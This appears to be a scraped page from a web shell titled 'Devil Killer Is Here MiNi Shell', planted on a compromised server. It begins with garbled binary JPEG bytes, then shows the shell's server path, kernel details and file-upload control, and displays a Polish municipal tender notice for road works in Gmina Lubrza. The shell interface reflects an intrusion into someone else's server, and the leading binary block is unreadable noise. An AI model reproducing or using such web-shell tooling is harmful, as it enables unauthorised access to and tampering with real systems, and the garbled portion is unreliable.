JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221010/0038522301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja i przebudowa dróg gminnych i wewnętrznych na terenie Gminy Lubrza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUBRZA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413165</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wolności 73</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubrza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">48-231</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lubrza.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.lubrza.opole.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja i przebudowa dróg gminnych i wewnętrznych na terenie Gminy Lubrza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aa39ddcc-4861-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00385223</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039774/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja i przebudowa dróg gminnych i wewnętrznych na terenie Gminy Lubrza</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.lubrza.opole.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://epuap.gov.pl/wps/portal<br/>urzad@lubrza.opole.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się wyłącznie drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAP https://epuap.gov.pl/wps/portal oraz adresu poczty elektronicznej: urzad@lubrza.opole.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/warunkiUslugi.aspx<br/>oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150 MB. Opis sposobu udzielania wyjaśnień treści SWZ<br/>6. Specyfikacja Warunków Zamówienia (SWZ) udostępniona jest na stronie internetowej: https://miniportal.uzp.gov.pl/,<br/>https://bip.lubrza.opole.pl/ od dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>7. Stosowanie do art. 284 ustawy Pzp Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert – pod<br/>warunkiem, że wniosek o wyjaśnienie treści specyfikacji warunków zamówienia wpłynął do Zamawiającego nie później niż na 4 dni<br/>przed upływem terminu składania ofert, licząc, zgodnie z zapisami art. 283 ustawy Pzp, od dnia zamieszczenia ogłoszenia o<br/>zamówieniu w Biuletynie Zamówień Publicznych.<br/>8. Szczegółowe wytyczne dotyczące składania wniosków o wyjaśnienie treści SWZ zawierają „Instrukcje użytkowników”,<br/>zamieszczone na stronie internetowej: https://miniportal.uzp.gov.pl/Instrukcje.<br/>9. Zgodnie z art.284 ust. 4 ustawy Pzp – w przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa<br/>w ust. 2, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.<br/>Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.<br/>10. Wyjaśnienia treści specyfikacji oraz jej ewentualne zmiany będą dokonywane zgodnie z art. 284 ustawy Pzp. Treść zapytań<br/>wraz z wyjaśnieniami Zamawiający udostępnia na stronie internetowej prowadzonego postępowania, bez ujawniania źródła<br/>zapytania. Wykonawcy ubiegający się o udzielenie zamówienia zobowiązani są do zapoznania się z treścią wyjaśnień<br/>zamieszczanych na stronie internetowej, na której udostępniono specyfikację.<br/>11. Zamawiający nie przewiduje zwołania zebrania Wykonawców w celu wyjaśnienia wątpliwości dotyczących treści SWZ.<br/>12. W przypadku gdy zmiany treści SWZ jest istotna dla sporządzenia oferty lub wymagają od Wykonawców dodatkowego czasu na<br/>zapoznanie się ze zmianą SWZ i przygotowanie ofert, Zamawiający przedłuży termin składania ofert o czas niezbędny na ich<br/>przygotowanie (art. 286 ust.3 ustawy Pzp).<br/>13.Zamawiający sugeruje, aby korespondencja dotycząca niniejszego postępowania o udzielenie zamówienia publicznego<br/>oznaczone były nazwą oraz znakiem postępowania.<br/>14. Osoby uprawnione do komunikowania się z Wykonawcami:<br/>1) w zakresie dotyczącym zagadnień proceduralnych:<br/>Justyna Lubczyk: tel.: 77 407 46 53<br/>2) w zakresie dotyczącym przedmiotu zamówienia:<br/>Remigiusz Koczut: tel.: 77 407 46 56</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące RODO zawarto w rozdziale 33. SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dotyczące RODO zawarto w rozdziale 33. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">V.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) CZĘŚĆ I: Przebudowa drogi gminnej G 107312 O w Lubrzy oraz drogi G 107303 O w Prężynce<br/><br/>a)	Przebudowa drogi gminnej G 107312 O w Lubrzy ul. Szkolna – długość ok. 600 mb. <br/>Planowany zakres robót: wykonanie pełnej podbudowy pod całością drogi wraz z warstwami nawierzchni asfaltowej, nowe elementy konstrukcyjne drogi tj. krawężniki, obrzeża, przebudowa zjazdów i poboczy, przebudowa i ewentualna rozbudowa sieci kanalizacji deszczowej, wymiana opraw oświetleniowych na istniejących słupach, wykonanie geologii dla całości odcinka, utwardzenie terenu.<br/>b)	Remont/przebudowa drogi gminnej G 107303 O w miejscowości Prężynka – długość ok. 925 mb. <br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz z elementami konstrukcyjnymi drogi tj. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, remont i regulacja barierek drogowych i mostowych, wymiana opraw oświetleniowych na istniejących słupach.<br/><br/>Ponadto Zamawiający informuje, że dla części I przedmiotu zamówienia:<br/>- wywóz ziemi i gruzu na odległość 1 km został przyjęty automatycznie w robotach ziemnych pozycja 15 - ustalając tak adekwatnie do następnych pozycji wywozu gdzie założono pozycje robót ziemnych z wywozem na 1 km natomiast łączna ilość kilometrów wywozu wynosi 7 km;<br/>- załadunek frezowiny, jej wywóz, rozścielenie wraz z wałowaniem należy przyjąć na odległość do 11 km wg dołączonego przedmiaru, natomiast konkretne miejsce zostanie wskazane w trakcie realizacji inwestycji;<br/>- załadunek warstwy tłucznia, jego wywóz, rozścielenie wraz z wałowaniem należy przyjąć na odległość do 11 km wg dołączonego przedmiaru, natomiast konkretne miejsce zostanie wskazane w trakcie realizacji inwestycji;<br/>- dopuszcza się stosowanie stabilizacji wyłącznie dowiezionej z wytwórni na miejsce budowy. Zdaniem Zamawiającego wykonywanie jej na miejscu budowy nie gwarantuje założeń wytrzymałościowych przyjętych w dokumentacji.<br/>- Parametry geowłóknin przeznaczonych do regeneracji nawierzchni bitumicznych to: Geosyntetyk GLASSTAR do nawierzchni bitumicznych siatka 50/50 z włókna szklanego o wytrzymałości min 50kN lub innego producenta o równoważnych parametrach technicznych.<br/>- W części I przedmiaru pkt. 59 d.1.9 dotyczącego montażu wiaty wystąpił błąd pisarski. Prawidłowe wymiary wiaty to 310cm x 490cm x 246cm – lub zbliżone przy zachowaniu funkcji oraz powierzchni 15m2 +/- 1m2. Przykładowym producentem tego typu wiaty posiadającym możliwości wykonania zakresu wg. założeń jest np. firma BrasiT, 24-170 Kurów, ul. Lubelska 46.<br/>- Jako kamień ozdobny należy przyjąć mieszankę granitową drobnoziarnistą – kolorystyka do uzgodnienia z projektantem pełniącym nadzór autorski.<br/>- Na wymianę opraw oświetleniowych nie ma konieczności uzyskania pozwoleń oraz PW. Załączona do SWZ dokumentacja jest uszczegółowiona w sposób wystarczający do poprawnego wykonania zadania. Właścicielem opraw większości jest zamawiający, a umowa współkorzystania pomiędzy Tauron Nowe Technologie, a zamawiającym będzie podpisana przed finalnym rozpoczęciem robót. Komplet dokumentów formalno prawnych niezbędny dla całego zakresu robót budowlanych oraz ich warunków został dołączony do dokumentacji technicznej branży elektrycznej.<br/>- Wysięgnik oświetlenia winien spełniać wymagania minimalne tj. 0,5m wysięg, 5 stopni nachylenia oraz materiał ocynk. Zakres zadania nie zakłada nowych słupów oświetleniowych (błędnie dodano pozycję nr 122) co potwierdza przedłożona dokumentacja. Jednocześnie ilość opraw oświetleniowych po korekcie wynosi 19 sztuk.<br/>- Poz. 16 przedmiaru - wymiana kompletna zaworów i zasuw wodociągowych i hydrantowych- wymiana istniejących urządzeń - komplet prac przy wymianie urządzeń i dostosowanie ich do wysokości wg założeń od spółki wodociągowej należy rozumieć jako:<br/>•	wymianę nawiertek przyłączy wodociągowych w pełnym komplecie (m.in obudowa nawiertki, skrzynka żeliwna typ średni, oznaczenie terenu tabliczką informacyjną w terenie oraz doprowadzenie do użytku przyłącza do ciągłości zapewnienia wody. Ilość zaworów 5 kompletów. wPe32<br/>•	wymianę hydrantów naziemnych ze stopkami hydrantowymi z armaturą zaporową włącznie czyli zasuwą odcinającą hydrant, obudowa zasuwy, skrzynka żeliwna typu średniego wraz z oznaczeniem tabliczką informacyjną. Hydranty DN 80. Ilość hydrantów 2- jeden naziemny, drugi podziemny.<br/>Ponadto założenia zarządcy sieci znajdują się w dokumentacji technicznej w wersji PDF. Wykonawca jest zobowiązany do wykonania badań antybakteryjnych po wykonaniu robót budowlanych na urządzeniach wodociągowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233300-2 - Fundamentowanie autostrad, dróg, ulic i ścieżek ruchu pieszego</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2) CZĘŚĆ II: Modernizacja i przebudowa wybranych odcinków dróg wewnętrznych we wsiach Trzebina, Jasiona, Skrzypiec, Dytmarów, Nowy Browiniec oraz drogi gminnej we wsi Jasiona <br/>a) Remont drogi gminnej G 107304 O i dróg wewnętrznych w miejscowości Jasiona – długość ok. 763 mb.<br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz z elementami konstrukcyjnymi drogi np.: krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, remont istniejącej sieci kanalizacji deszczowej, remont istniejących krawężników granitowych, remont utwardzenia, wymiana barierek drogowych i mostowych.<br/>b)	Remont drogi gminnej G 107315 O w miejscowości Skrzypiec – długość ok. 452 mb.<br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz z elementami konstrukcyjnymi drogi np. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, remont i regulacja barierek drogowych i mostowych.<br/>c)	Remont drogi gminnej wewnętrznej w miejscowości Nowy Browiniec – długość ok. 303 mb. <br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz elementami konstrukcyjnymi drogi tj. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, remont/przebudowa istniejącej sieci kanalizacji deszczowej, remont i regulacja barierek drogowych i mostowych.<br/>d)	Remont drogi gminnej wewnętrznej w miejscowości Trzebina od mostku do boiska sportowego – długość ok. 680 mb.<br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz z elementami konstrukcyjnymi drogi tj. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, wymiana barierek drogowych i mostowych.<br/>e)	Przebudowa drogi gminnej wewnętrznej w miejscowości Trzebina od DK 41 do kurników – długość ok. 560 mb.<br/>Planowany zakres robót: przebudowa istniejącej nawierzchni asfaltowej oraz warstw podbudowy wraz z elementami konstrukcyjnymi drogi tj. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy, wykonanie geologii dla całego odcinka.<br/>f) Przebudowa drogi gminnej wewnętrznej dz. ew. 607, 617 w miejscowości Trzebina –długość ok. 145 mb.<br/>Planowany zakres robót: remont istniejącej nawierzchni asfaltowej wraz z elementami konstrukcyjnymi drogi tj. krawężniki, obrzeża, remont zjazdów i poboczy, ewentualna wymiana podbudowy.<br/><br/>Ponadto Zamawiający informuje, że dla części II przedmiotu zamówienia:<br/>- wywóz ziemi i gruzu na odległość 1 km został przyjęty automatycznie w robotach ziemnych pozycja 15 -ustalając tak adekwatnie do następnych pozycji wywozu gdzie założono pozycje robót ziemnych z wywozem na 1 km natomiast łączna ilość kilometrów wywozu wynosi 7 km;<br/>- załadunek frezowiny, jej wywóz, rozścielenie wraz z wałowaniem należy przyjąć na odległość do 11 km wg dołączonego przedmiaru, a konkretne miejsce zostanie wskazane w trakcie realizacji inwestycji;<br/>- dylatacje należy wykonać zgodnie z zasadami sztuki budowlanej i zapisami w dokumentacji przetargowej np. dylatacja bitumiczna zgodnie z zapisami załączonej STWIORB;<br/>- w odniesieniu do części II przedmiaru pkt 78 d.2.4, 82 d.2.5 Nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wyrównawcza 150kg/m2-AC 16W należy rozumieć jako grubość zmienną, zależną od nierówności na drodze lecz nie mniej niż 4 cm do uzyskania wymaganej równości podłużnej określonej w szczegółowej specyfikacji technicznej;<br/>- kanalizację należy oczyścić metodą tradycyjną przy pomocy samochodu typu WUKO;<br/>- rury z demontażu należy w miarę możliwości zdemontować nie uszkadzając ich i odłożyć we wskazane przez Zamawiającego miejsce;<br/>- celem szczegółowej oceny zakresu czyszczenia i malowania istniejących barierek mostowych oraz prostowania elementów Zamawiający zachęca oferentów do przeprowadzenia wizji lokalnej;<br/>- w odniesieniu do części II przedmiaru pkt 39 d.1. 6 nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszczeniu 6 cm AC16W z uwzględnieniem poszerzeń 2 426,00 m2 - Zamawiający informuje, iż poszerzenia są uzupełniane mieszankami kamiennymi w związku z powyższym nie należy ich doliczać do zakładanych powierzchni bitumicznych.<br/>- w części II przedmiaru pkt 82 d.2.5 Nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wyrównawcza 150kg/m2-AC 16W z uwzględnieniem poszerzeń 1770,00 m2 - Zamawiający informuje, iż poszerzenia są uzupełniane mieszankami kamiennymi w związku z powyższym nie należy ich doliczać do zakładanych powierzchni bitumicznych.<br/>- w części II przedmiaru pkt 124 d.3. 5 Nawierzchnia z mieszanek mineralno-bitumicznych grysowych- warstwa wiążąca 6cm - AC 16W z uwzględnieniem poszerzeń 457,000 m2 – Zamawiający informuje że poszerzenia są uzupełniane mieszankami kamiennymi w związku z powyższym nie należy ich doliczać do zakładanych powierzchni bitumicznych;<br/>- poz. 80 przedmiaru - wymiana kompletna zaworów i zasuw wodociągowych i hydrantowych - wymiana istniejących urządzeń - komplet prac przy wymianie urządzeń i dostosowanie ich do wysokości wg założeń od spółki wodociągowej należy rozumieć jako:<br/>•	wymianę nawiertek przyłączy wodociągowych w pełnym komplecie (m.in obudowa nawiertki, skrzynka żeliwna typ średni, oznaczenie terenu tabliczką informacyjną w terenie oraz doprowadzenie do użytku przyłącza do ciągłości zapewnienia wody. Ilość zaworów 5 kompletów. wPe32<br/>•	wymianę hydrantów naziemnych ze stopkami hydrantowymi z armaturą zaporową włącznie czyli zasuwą odcinającą hydrant, obudowa zasuwy, skrzynka żeliwna typu średniego wraz z oznaczeniem tabliczką informacyjną. Hydranty DN 80. Ilość hydrantów 2- jeden naziemny, drugi podziemny.<br/>Ponadto założenia zarządcy sieci znajdują się w dokumentacji technicznej w wersji PDF. Wykonawca jest zobowiązany do wykonania badań antybakteryjnych po wykonaniu robót budowlanych na urządzeniach wodociągowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p 